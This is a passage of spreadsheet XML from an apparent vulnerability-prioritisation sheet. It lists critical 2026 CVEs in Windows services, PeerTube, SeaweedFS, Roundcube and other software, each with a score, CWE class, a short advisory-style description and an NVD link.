      <c r="B218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69845</t>
        </is>
      </c>
      <c r="C218" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D218" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E218" s="5" t="inlineStr"/>
      <c r="F218" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G218" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H218" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I218" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J218" s="5" t="inlineStr"/>
      <c r="K218" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="L218" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69845</t>
        </is>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69910</t>
        </is>
      </c>
      <c r="C219" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D219" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E219" s="5" t="inlineStr"/>
      <c r="F219" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G219" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H219" s="5" t="inlineStr"/>
      <c r="I219" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J219" s="5" t="inlineStr"/>
      <c r="K219" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L219" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Hyper-V allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69910</t>
        </is>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70296</t>
        </is>
      </c>
      <c r="C220" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D220" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E220" s="5" t="inlineStr"/>
      <c r="F220" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G220" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H220" s="5" t="inlineStr"/>
      <c r="I220" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J220" s="5" t="inlineStr"/>
      <c r="K220" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L220" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70296</t>
        </is>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71374</t>
        </is>
      </c>
      <c r="C221" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D221" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E221" s="5" t="inlineStr"/>
      <c r="F221" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G221" s="5" t="inlineStr"/>
      <c r="H221" s="5" t="inlineStr"/>
      <c r="I221" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J221" s="5" t="inlineStr"/>
      <c r="K221" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L221" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data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M221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71374</t>
        </is>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71376</t>
        </is>
      </c>
      <c r="C222" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D222" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E222" s="5" t="inlineStr"/>
      <c r="F222" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G222" s="5" t="inlineStr"/>
      <c r="H222" s="5" t="inlineStr"/>
      <c r="I222" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J222" s="5" t="inlineStr"/>
      <c r="K222" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L222" s="5" t="inlineStr">
        <is>
          <t>OS command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M222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71376</t>
        </is>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71377</t>
        </is>
      </c>
      <c r="C223" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D223" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E223" s="5" t="inlineStr"/>
      <c r="F223" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G223" s="5" t="inlineStr"/>
      <c r="H223" s="5" t="inlineStr"/>
      <c r="I223" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J223" s="5" t="inlineStr"/>
      <c r="K223" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="L223" s="5" t="inlineStr">
        <is>
          <t>Command Argument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through 11-00-12, from 09-87 before 09-87-10, from 09-80 through 09-80-04, from 09-70 before 09-70-28, from 09-50 through 09-50-22, and from 09-00 through 09-00-18.</t>
        </is>
      </c>
      <c r="M223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71377</t>
        </is>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B224" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71624</t>
        </is>
      </c>
      <c r="C224" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D224" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E224" s="5" t="inlineStr"/>
      <c r="F224" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G224" s="5" t="inlineStr"/>
      <c r="H224" s="5" t="inlineStr"/>
      <c r="I224" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J224" s="5" t="inlineStr"/>
      <c r="K224" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L224" s="5" t="inlineStr">
        <is>
          <t>An issue in esoTalk v.1.0.0g4 allows a remote attacker to execute arbitrary code via the core/models/ETMemberModel.class.php, core/controllers/ETMemberController.class.php, and core/lib/ET.class.php components</t>
        </is>
      </c>
      <c r="M224" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71624</t>
        </is>
      </c>
    </row>
    <row r="225">
      <c r="A225" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B225" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71625</t>
        </is>
      </c>
      <c r="C225" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D225" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E225" s="5" t="inlineStr"/>
      <c r="F225" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G225" s="5" t="inlineStr"/>
      <c r="H225" s="5" t="inlineStr"/>
      <c r="I225" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J225" s="5" t="inlineStr"/>
      <c r="K225" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-640</t>
        </is>
      </c>
      <c r="L225" s="5" t="inlineStr">
        <is>
          <t>An issue in slimkit plus ThinkSNS+ v.2.4 allows a remote attacker to escalate privileges via the ResetPasswordController.php component</t>
        </is>
      </c>
      <c r="M225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71625</t>
        </is>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71805</t>
        </is>
      </c>
      <c r="C226" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D226" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E226" s="5" t="inlineStr"/>
      <c r="F226" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G226" s="5" t="inlineStr"/>
      <c r="H226" s="5" t="inlineStr"/>
      <c r="I226" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J226" s="5" t="inlineStr"/>
      <c r="K226" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L226" s="5" t="inlineStr">
        <is>
          <t>An arbitrary file upload and path traversal vulnerability exists in LZ-litchi 1.0.0. Unauthenticated remote attackers can upload arbitrary files and write them outside the intended storage directory via the directory parameter in POST /app-api/infra/file/upload.</t>
        </is>
      </c>
      <c r="M226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71805</t>
        </is>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7188</t>
        </is>
      </c>
      <c r="C227" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D227" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E227" s="5" t="inlineStr"/>
      <c r="F227" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G227" s="5" t="inlineStr"/>
      <c r="H227" s="5" t="inlineStr"/>
      <c r="I227" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J227" s="5" t="inlineStr"/>
      <c r="K227" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L227" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability in Armiya Information Technologies Ltd. Co. Access Control System allows SQL Injection.
This issue affects Access Control System: before Versiyon 2.</t>
        </is>
      </c>
      <c r="M227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7188</t>
        </is>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72920</t>
        </is>
      </c>
      <c r="C228" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D228" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E228" s="5" t="inlineStr"/>
      <c r="F228" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G228" s="5" t="inlineStr"/>
      <c r="H228" s="5" t="inlineStr"/>
      <c r="I228" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J228" s="5" t="inlineStr"/>
      <c r="K228" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L228" s="5" t="inlineStr">
        <is>
          <t>SeaweedFS is a distributed storage system. Prior to 4.24, the filer registers the SeaweedIdentityAccessManagement gRPC service without mandatory authentication when jwt.filer_signing.key is unset, allowing any client that can reach the filer gRPC port to invoke CreateUser, CreateAccessKey, PutPolicy, and related IAM RPCs to mint credentials and gain S3 administrative control. This issue is fixed in versions 4.24.</t>
        </is>
      </c>
      <c r="M228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72920</t>
        </is>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72979</t>
        </is>
      </c>
      <c r="C229" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D229" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E229" s="5" t="inlineStr"/>
      <c r="F229" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G229" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H229" s="5" t="inlineStr"/>
      <c r="I229" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J229" s="5" t="inlineStr"/>
      <c r="K229" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L229" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72979</t>
        </is>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72982</t>
        </is>
      </c>
      <c r="C230" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D230" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E230" s="5" t="inlineStr"/>
      <c r="F230" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G230" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H230" s="5" t="inlineStr"/>
      <c r="I230" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J230" s="5" t="inlineStr"/>
      <c r="K230" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L230" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Netlogon allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72982</t>
        </is>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72983</t>
        </is>
      </c>
      <c r="C231" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D231" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E231" s="5" t="inlineStr"/>
      <c r="F231" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G231" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H231" s="5" t="inlineStr"/>
      <c r="I231" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J231" s="5" t="inlineStr"/>
      <c r="K231" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L231" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Internet Connection Sharing (ICS) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72983</t>
        </is>
      </c>
    </row>
    <row r="232">
      <c r="A232" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73009</t>
        </is>
      </c>
      <c r="C232" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D232" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E232" s="5" t="inlineStr"/>
      <c r="F232" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G232" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H232" s="5" t="inlineStr"/>
      <c r="I232" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J232" s="5" t="inlineStr"/>
      <c r="K232" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L232" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Secure Socket Tunneling Protocol (SSTP) allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73009</t>
        </is>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73010</t>
        </is>
      </c>
      <c r="C233" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D233" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E233" s="5" t="inlineStr"/>
      <c r="F233" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G233" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H233" s="5" t="inlineStr"/>
      <c r="I233" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J233" s="5" t="inlineStr"/>
      <c r="K233" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L233" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Failover Cluster allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73010</t>
        </is>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73025</t>
        </is>
      </c>
      <c r="C234" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D234" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E234" s="5" t="inlineStr"/>
      <c r="F234" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G234" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H234" s="5" t="inlineStr"/>
      <c r="I234" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J234" s="5" t="inlineStr"/>
      <c r="K234" s="5" t="inlineStr">
        <is>
          <t>CWE-1390</t>
        </is>
      </c>
      <c r="L234" s="5" t="inlineStr">
        <is>
          <t>Weak authentication in Windows iSCSI allows an unauthorized attacker to bypass a security feature over a network.</t>
        </is>
      </c>
      <c r="M234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73025</t>
        </is>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73211</t>
        </is>
      </c>
      <c r="C235" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D235" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E235" s="5" t="inlineStr"/>
      <c r="F235" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G235" s="5" t="inlineStr"/>
      <c r="H235" s="5" t="inlineStr"/>
      <c r="I235" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J235" s="5" t="inlineStr"/>
      <c r="K235" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L235" s="5" t="inlineStr">
        <is>
          <t>PeerTube is an ActivityPub-federated video streaming platform. Prior to 8.1.6, ActorFollowModel.updateScore() interpolates the attacker-controlled ActivityPub actor inboxUrl into an SQL query, allowing an unauthenticated remote server to read and write PeerTube database tables, including oAuthToken.accessToken, and take over administrator accounts. This issue is fixed in version 8.1.6.</t>
        </is>
      </c>
      <c r="M235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73211</t>
        </is>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73778</t>
        </is>
      </c>
      <c r="C236" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D236" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E236" s="5" t="inlineStr"/>
      <c r="F236" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G236" s="5" t="inlineStr"/>
      <c r="H236"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I236" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J236" s="5" t="inlineStr"/>
      <c r="K236" s="5" t="inlineStr">
        <is>
          <t>CWE-521</t>
        </is>
      </c>
      <c r="L236" s="5" t="inlineStr">
        <is>
          <t>A vulnerability exists in the Credential Manager component that may allow for unauthorized administrative access. An unauthenticated remote attacker could exploit this vulnerability on a device in its factory-default or post-ZTP state before any administrator has configured credentials by providing a predictable factory-default password. Successful exploitation could result in full administrative control of the affected device during the initial setup process.</t>
        </is>
      </c>
      <c r="M236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73778</t>
        </is>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75003</t>
        </is>
      </c>
      <c r="C237" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D237" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E237" s="5" t="inlineStr"/>
      <c r="F237" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G237" s="5" t="inlineStr"/>
      <c r="H237" s="5" t="inlineStr">
        <is>
          <t>roundcube:webmail</t>
        </is>
      </c>
      <c r="I237" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J237" s="5" t="inlineStr"/>
      <c r="K237" s="5" t="inlineStr">
        <is>
          <t>CWE-669</t>
        </is>
      </c>
      <c r="L237" s="5" t="inlineStr">
        <is>
          <t>In Roundcube Webmail before 1.6.18 and 1.7.x before 1.7.3, an unclosed url() in a FuncIRI attribute of an SVG image could evade the remote image blocking, which may lead to information disclosure or privilege escalation.</t>
        </is>
      </c>
      <c r="M237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75003</t>
        </is>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75325</t>
        </is>
      </c>
      <c r="C238" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D238" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E238" s="5" t="inlineStr"/>
      <c r="F238" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G238" s="5" t="inlineStr"/>
      <c r="H238" s="5" t="inlineStr"/>
      <c r="I238" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J238" s="5" t="inlineStr"/>
      <c r="K238" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L238" s="5" t="inlineStr">
        <is>
          <t>DWSurvey v6.14.0 is is vulnerable to authentication bypass via the '/api/dwsurvey/none/' and '/api/dwsurvey/up/**' parameters.</t>
        </is>
      </c>
      <c r="M238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75325</t>
        </is>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75337</t>
        </is>
      </c>
      <c r="C239" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D239" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E239" s="5" t="inlineStr"/>
      <c r="F239" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G239" s="5" t="inlineStr"/>
      <c r="H239" s="5" t="inlineStr"/>
      <c r="I239" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J239" s="5" t="inlineStr"/>
      <c r="K239" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L239" s="5" t="inlineStr">
        <is>
          <t>The static resource interface /api/static/{deployKey}/ of Yu AI Code Mother v4.3 is vulnerable to path traversal. The user-controlled path is concatenated to the preview root directory without any normalization, allowing anonymous attackers to read files outside the preview root.</t>
        </is>
      </c>
      <c r="M239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75337</t>
        </is>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75338</t>
        </is>
      </c>
      <c r="C240" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D240" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E240" s="5" t="inlineStr"/>
      <c r="F240" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G240" s="5" t="inlineStr"/>
      <c r="H240" s="5" t="inlineStr"/>
      <c r="I240" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J240" s="5" t="inlineStr"/>
      <c r="K240" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L240" s="5" t="inlineStr">
        <is>
          <t>disconf (Distributed Configuration Management Platform) 2.6.36 is vulnerable to Incorrect Access Control. The config-fetching APIs /api/config/item, /api/config/file, /api/config/list and /api/config/simple/list are exposed without authentication. The LoginInterceptor explicitly whitelists these four paths, so any anonymous attacker can read every configuration item and configuration file managed by the config center.</t>
        </is>
      </c>
      <c r="M240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75338</t>
        </is>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75430</t>
        </is>
      </c>
      <c r="C241" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D241" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E241" s="5" t="inlineStr"/>
      <c r="F241" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G241" s="5" t="inlineStr"/>
      <c r="H241" s="5" t="inlineStr"/>
      <c r="I241" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J241" s="5" t="inlineStr"/>
      <c r="K241" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L241" s="5" t="inlineStr">
        <is>
          <t>PowerJob Worker version 5.1.2 (and likely earlier versions) exposes the /worker/deployContainer HTTP endpoint without authentication on the default transport port. This allows a remote attacker to execute arbitrary code.</t>
        </is>
      </c>
      <c r="M241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75430</t>
        </is>
      </c>
    </row>
    <row r="242">
      <c r="A242" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
